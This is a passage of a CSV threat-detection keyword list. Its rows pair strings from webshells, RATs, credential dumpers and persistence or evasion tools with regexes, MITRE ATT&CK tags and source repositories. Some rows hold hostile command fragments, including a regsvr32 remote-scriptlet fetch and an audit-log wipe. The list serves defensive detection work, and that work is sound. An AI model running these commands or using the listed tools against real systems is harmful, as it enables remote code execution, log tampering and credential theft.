RFI Olarak Kullanilmaz .PHP Olarak Host'a Yukleyiniz*",".{0,1000}\RFI\sOlarak\sKullanilmaz\s\.PHP\sOlarak\sHost\'a\sYukleyiniz.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20246" "*Wardom | Ne Mutlu T*",".{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20247" "*<param name=""""keylogger""*",".{0,1000}\<param\sname\=\""keylogger\"".{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20248" "*<SessionId>: list/steal token from specific session*",".{0,1000}\<SessionId\>\:\slist\/steal\stoken\sfrom\sspecific\ssession.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","20256" "*<title>Dynasty Persist*",".{0,1000}\Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with 
Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","20259" "*PrivescCheck Report*",".{0,1000}\PrivescCheck\sReport\<\/title\>.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","20260" "*Sosyete Safe Mode Bypass Shell -*",".{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20261" "*<title>SyRiAn Sh3ll ~*",".{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20262" "*<title>WebRoot Hack Tools""*",".{0,1000}\<title\>WebRoot\sHack\sTools\"".{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title 
webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20263" "*<title>Wraith Login*",".{0,1000}\Wraith\sLogin\<\/title\>.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","20264" "*= ""evil-proxy""*",".{0,1000}\=\s\""evil\-proxy\"".{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","20265" "*= HUC Packet Transmit Tool V*",".{0,1000}\=\sHUC\sPacket\sTransmit\sTool\sV.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","20266" "*= Welcome to Orc Shell =*",".{0,1000}\=\sWelcome\sto\sOrc\sShell\s\=.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #content","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","20267" "*=[ 1n73ct10n privat shell ]=*",".{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20268" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","20269" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","20270" "*--==[[ Andela Yuwono Priv8 Shell ]]==--*",".{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20271" "*=== Cached GPP Password ===*",".{0,1000}\=\=\=\sCached\sGPP\sPassword\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - 
TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20272" "*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*",".{0,1000}\=\=\=\sGENERATING\sMALICIOUS\sGROUP\sPOLICY\sTEMPLATE\s\=\=\=.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","20273" "*=== LAUNCHING SMB SERVER AND WAITING FOR GPT REQUESTS ===*",".{0,1000}\=\=\=\sLAUNCHING\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPT\sREQUESTS\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20274" "*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20275" "*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp 
is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","20276" "*=== SPOOFING THE GPLINK ATTRIBUTE OF THE TARGET OU ===*",".{0,1000}\=\=\=\sSPOOFING\sTHE\sGPLINK\sATTRIBUTE\sOF\sTHE\sTARGET\sOU\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20277" "*=== WAITING (GPT REQUESTS WILL BE FORWARDED TO SMB SERVER) ===*",".{0,1000}\=\=\=\sWAITING\s\(GPT\sREQUESTS\sWILL\sBE\sFORWARDED\sTO\sSMB\sSERVER\)\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20278" "*=== WAITING (SMB NTLM AUTHENTICATION COERCED TO *",".{0,1000}\=\=\=\sWAITING\s\(SMB\sNTLM\sAUTHENTICATION\sCOERCED\sTO\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20279" "*===[[[ A Black Path Toward The Sun 
]]]===*",".{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","20280" "*=========== Havoc and msf revshell ========*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\sHavoc\sand\smsf\srevshell\s\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20281" "*======================== htran V%s =======================*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\shtran\sV\%s\s\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","20282" "*===PARASITE INVOKE*",".{0,1000}\=\=\=PARASITE\sINVOKE.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","20283" "*==> Python3 C&C server <==*",".{0,1000}\=\=\>\sPython3\sC\&C\sserver\s\<\=\=.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","20284" "*==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U*",".{0,1000}\=\=gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20285" "*==gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20286" "*==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20287" "*==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20288" "*==wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20289" "*==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20290" 
"*==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20291" "*=Administrator.ccache*",".{0,1000}\=Administrator\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","20292" "*=imaohw*",".{0,1000}\=imaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20294" "*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*",".{0,1000}\=MSEXCEL.{0,1000}regsvr32\s\/s\s\/n\s\/u\s\/i\:http.{0,1000}\/SCTLauncher\.sct\sscrobj\.dll.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","20295" 
"*=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC*",".{0,1000}\=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","20297" "*=resu ten*",".{0,1000}\=resu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20298" "*> /var/log/audit/audit.log* rm -f .*",".{0,1000}\>\s\/var\/log\/audit\/audit\.log.{0,1000}\srm\s\-f\s\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","20299" "*> chntpw Main Interactive Menu <*",".{0,1000}\>\schntpw\sMain\sInteractive\sMenu\s\<.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20300" "*> msfinstall*",".{0,1000}\>\smsfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20301" "*---------------------> SYSKEY CHECK <-----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\>\sSYSKEY\sCHECK\s\<\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20302" "*> WELCOME TO THE TORCT WEB-CLIENT *",".{0,1000}\>\sWELCOME\sTO\sTHE\sTORCT\sWEB\-CLIENT\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20303" "*>[ STARTING CRASH DUMP ACQUISITION ]<*",".{0,1000}\>\[\sSTARTING\sCRASH\sDUMP\sACQUISITION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","20304" "*>[ STARTING NT HASHES EXTRACTION ]<*",".{0,1000}\>\[\sSTARTING\sNT\sHASHES\sEXTRACTION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","20305" "*>[BAD R.A.T.]-Company<*",".{0,1000}\>\[BAD\sR\.A\.T\.\]\-Company\<.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20306" "*>\fuego-control*",".{0,1000}\>\\fuego\-control.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20307" "*>\fuego-data*",".{0,1000}\>\\fuego\-data.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows 
remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20308" "*>\fuegoshell*",".{0,1000}\>\\fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20309" "*>\gsecdump_*",".{0,1000}\>\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","20310" "*>> Where to hide the payload? 
